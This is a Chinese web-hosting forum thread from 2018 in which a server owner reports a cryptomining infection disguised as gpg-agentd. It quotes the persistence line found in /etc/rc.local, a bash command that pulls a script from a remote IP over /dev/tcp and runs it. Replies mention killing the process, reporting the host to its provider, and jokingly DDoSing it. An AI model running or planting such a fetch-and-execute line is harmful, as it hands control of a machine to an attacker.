全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

CeraNetworks网络延迟测速工具IP归属甄别会员请立即修改密码
查看: 3823|回复: 10

机器中挖矿木马,大佬帮我打死他谢谢了

[复制链接]
发表于 2018-3-12 11:54:39 | 显示全部楼层 |阅读模式
今天服务器报警CPU飚高一直降不下来,然后连ipmi
进去服务器发现一个/usr/bin/gpg-agentd 占用1100%cpu使用率
感觉到被入侵
然后发下 /etc/rc.local文件里面多了这段
/bin/bash -c cat</dev/tcp/159.89.190.243/44444|bash

大佬们帮我D死他
发表于 2018-3-12 11:55:38 来自手机 | 显示全部楼层
用kill 杀shi进程!然后再删除文件
发表于 2018-3-12 11:57:02 | 显示全部楼层
大佬们现在都在打香港的小鸡中
 楼主| 发表于 2018-3-12 11:58:20 | 显示全部楼层
专收爆米花 发表于 2018-3-12 11:55
用kill 杀shi进程!然后再删除文件

cat</dev/tcp/159.89.190.243/44444 这样执行,看到这个脚本。然后根据他的内容逐一来排查删除的。
 楼主| 发表于 2018-3-12 12:02:53 | 显示全部楼层
该ip是digitalocean 我到 https://www.digitalocean.com/company/contact/#abuse 举报了
发表于 2018-3-12 12:04:18 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
发表于 2018-3-12 12:24:24 | 显示全部楼层
哈哈  我早上也被入侵了。
发表于 2018-3-12 13:47:55 | 显示全部楼层
DigitalOcean的,有20G DDOS防御,D不死。不好意思
发表于 2018-3-12 13:52:32 | 显示全部楼层

这是一段什么代码?小白跪了
发表于 2018-3-12 14:12:30 | 显示全部楼层
吓得我赶紧看了一下冷门灵车
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2024-4-17 05:09 , Processed in 0.063436 second(s), 9 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表